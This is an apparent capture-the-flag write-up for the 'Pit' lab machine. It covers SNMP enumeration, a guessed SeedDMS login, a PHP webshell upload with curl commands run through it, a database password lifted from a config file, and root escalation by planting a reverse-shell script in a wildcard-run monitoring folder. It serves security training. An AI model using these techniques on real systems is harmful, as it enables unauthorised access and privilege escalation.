Pit
Gaining Access
Nmap scan:
$ nmap -p- --min-rate 5000 10.129.228.106
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-02 01:05 EDT
Nmap scan report for 10.129.228.106
Host is up (0.0095s latency).
Not shown: 65501 filtered tcp ports (no-response), 31 filtered tcp ports (host-unreach)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9090/tcp open zeus-admin2 HTTP ports for this one.
Web Rabbit Holes
Port 9090 was a HTTPS site with a login page:
We had no credentials and weak default credentials didn't work. Port 80 hosted a Red Hat default page:
Directory, subdomain and other web scans all didn't find anything. So this was an obvious rabbit hole.
UDP Ports -> SNMP Enum
I did another UDP scan in case I missed some stuff:
$ sudo nmap -sU --top-ports 30 --min-rate 5000 10.129.228.106
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-02 01:09 EDT
Nmap scan report for 10.129.228.106
Host is up (0.0089s latency).
PORT STATE SERVICE
53/udp open|filtered domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
69/udp open|filtered tftp
111/udp open|filtered rpcbind
123/udp filtered ntp
135/udp open|filtered msrpc
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
139/udp open|filtered netbios-ssn
161/udp open snmp
162/udp open|filtered snmptrap
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
514/udp open|filtered syslog
520/udp open|filtered route
631/udp open|filtered ipp
996/udp open|filtered vsinet
997/udp open|filtered maitrd
998/udp open|filtered puparp
999/udp open|filtered applix
1434/udp open|filtered ms-sql-m
1701/udp open|filtered L2TP
1900/udp open|filtered upnp
3283/udp open|filtered netassistant
4500/udp filtered nat-t-ike
5353/udp open|filtered zeroconf
49152/udp filtered unknown
49153/udp filtered unknown
49154/udp open|filtered unknownWe can see that SNMP is opened and not filtered. We can take a closer look at its version using nmap again.
$ sudo nmap -sU -p 161 -sV 10.129.228.106
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-02 01:10 EDT
Nmap scan report for 10.129.228.106
Host is up (0.0085s latency).
PORT STATE SERVICE VERSION
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
Service Info: Host: pit.htb
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.47 secondsIt seems that this is a SNMPv1 server and we might be able to access it via snmpwalk. There was a lot of information returned with a default and an extended scan:
$ snmpwalk -c public -v1 10.129.228.106 .1
iso.3.6.1.2.1.1.1.0 = STRING: "Linux pit.htb 4.18.0-305.10.2.el8_4.x86_64 #1 SMP Tue Jul 20 17:25:16 UTC 2021 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (276725) 0:46:07.25
iso.3.6.1.2.1.1.4.0 = STRING: "Root <root@localhost> (configure /etc/snmp/snmp.local.conf)"
iso.3.6.1.2.1.1.5.0 = STRING: "pit.htb"
iso.3.6.1.2.1.1.6.0 = STRING: "Unknown (edit /etc/snmp/snmpd.conf)"
<TRUNCATED>
iso.3.6.1.4.1.2021.9.1.2.2 = STRING: "/var/www/html/seeddms51x/seeddms"
<TRUNCATED>
$ snmpwalk -c public -v1 10.129.228.106 NET-SNMP-EXTEND-MIB::nsExtendObjects
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".24 = STRING: michelle user_u s0 *
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".25 = STRING: root unconfined_u s0-s0:c0.c1023 *
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".26 = STRING: System uptime
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".27 = STRING: 01:12:54 up 47 min, 0 users, load average: 0.08, 0.02, 0.02
End of MIBSo we have 2 users, michelle and root. We als ofound a new directory at Seed DMS or something. When we view the certificate of the HTTPS site on port 9090, we can see a new subdomain to enumerate.
Seed DMS
After adding the new domain to our hosts file, we can head to http://dms-pit.htb/seeddms51x/seeddms and find another login page:
I tried a few credentials, and found that michelle:michelle was the right one to login.
We can view the change log from the administrator, which states the version of Seed DMS that is currently being used.
It appears that this is version 5.1.15, which does not have any vulnerabilities via searchsploit. This service supports file uploads and is PHP based, so let's try to upload a webshell within Michells' folder.
This had the document ID of 29, but I didn't know what to do further. Checking the searchsploit output again, we can see that there are RCE exploits for this but they are of the wrong version.
$ searchsploit seed
--------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------- ---------------------------------
Deluge 1.3.15 - 'Webseeds' Denial of Service (PoC) | windows/dos/46884.py
Seeddms 5.1.10 - Remote Command Execution (RCE) (Authenticated) | php/webapps/50062.py
SeedDMS 5.1.18 - Persistent Cross-Site Scripting | php/webapps/48324.txt
SeedDMS < 5.1.11 - 'out.GroupMgr.php' Cross-Site Scripting | php/webapps/47024.txt
SeedDMS < 5.1.11 - 'out.UsrMgr.php' Cross-Site Scripting | php/webapps/47023.txt
SeedDMS versions < 5.1.11 - Remote Command Execution | php/webapps/47022.txt
SetSeed CMS 5.8.20 - 'loggedInUser' SQL Injection | php/webapps/18065.txt
Wordpress Plugin Maintenance Mode by SeedProd 5.1.1 - Persistent Cro | php/webapps/48724.txt
--------------------------------------------------------------------- ---------------------------------I decided to try the one for v5.1.11 again just in case. Following the PoC, I was able to replicate it and get RCE.
$ curl http://dms-pit.htb/seeddms51x/data/1048576/30/1.php?cmd=id
uid=992(nginx) gid=988(nginx) groups=988(nginx) context=system_u:system_r:httpd_t:s0Great! I tried to get a reverse shell as this user, but it seems that I couldn't even download any files or make any external connections. So we probably need to look around further.
CentOS Credentials
Since we had a webshell, I wanted to see if we could find the credentials for the CentOS interface we found earlier. We can slowly enumerate the file system:
$ curl -G --data-urlencode 'cmd=ls ../' http://dms-pit.htb/seeddms51x/data/1048576/30/1.php
21
29
30
$ curl -G --data-urlencode 'cmd=ls ../../' http://dms-pit.htb/seeddms51x/data/1048576/30/1.php
1048576
backup
cache
conf
log
lucene
staging
$ curl -G --data-urlencode 'cmd=ls ../../conf' http://dms-pit.htb/seeddms51x/data/1048576/30/1.php
settings.xml
settings.xml.template
stopwords.txtWithin settings.xml, we can find a set of credentials
<database dbDriver="mysql" dbHostname="localhost" dbDatabase="seeddms" dbUser="seeddms" dbPass="ied^ieY6xoquu" doNotCheckVersion="false">This doesn't work with SSH, but we can use this to login to the CentOS interface as michelle.
In the bottom left corner, we can access the Terminal application, which is basically another webshell as michelle.
Now, we can grab the user flag and also a reverse shell as the user.
Privilege Escalation
SNMP Processes -> Injection
I ran a LinPEAS scan on the machine to enumerate for me, and didn't find anything interesting. I wanted to see the processes that were running on the machine, and this could be done using snmpwalk as we did earlier. This is because root is probably running SNMP here.
iso.3.6.1.4.1.8072.1.3.2.2.1.2.6.109.101.109.111.114.121 = STRING: "/usr/bin/free"
iso.3.6.1.4.1.8072.1.3.2.2.1.2.10.109.111.110.105.116.111.114.105.110.103 = STRING: "/usr/bin/monitor"There were 2 binaries running, free and monitor. The former was an ELF binary, while the latter is, interestingly, a bash script.
[michelle@pit tmp]$ cat /usr/bin/monitor
#!/bin/bash
for script in /usr/local/monitoring/check*sh
do
/bin/bash $script
doneIt seems to be running any script using a wildcard. Plus, the user can write to the directory where the script resides. We can just create a script that gives us a reverse shell using a bash one-liner. Download that into the directory. Then, we can run the script by using snmpwalk:
snmpwalk -v1 -c public 10.129.228.106 NET-SNMP-EXTEND-MIB::nsExtendObjects
Last updated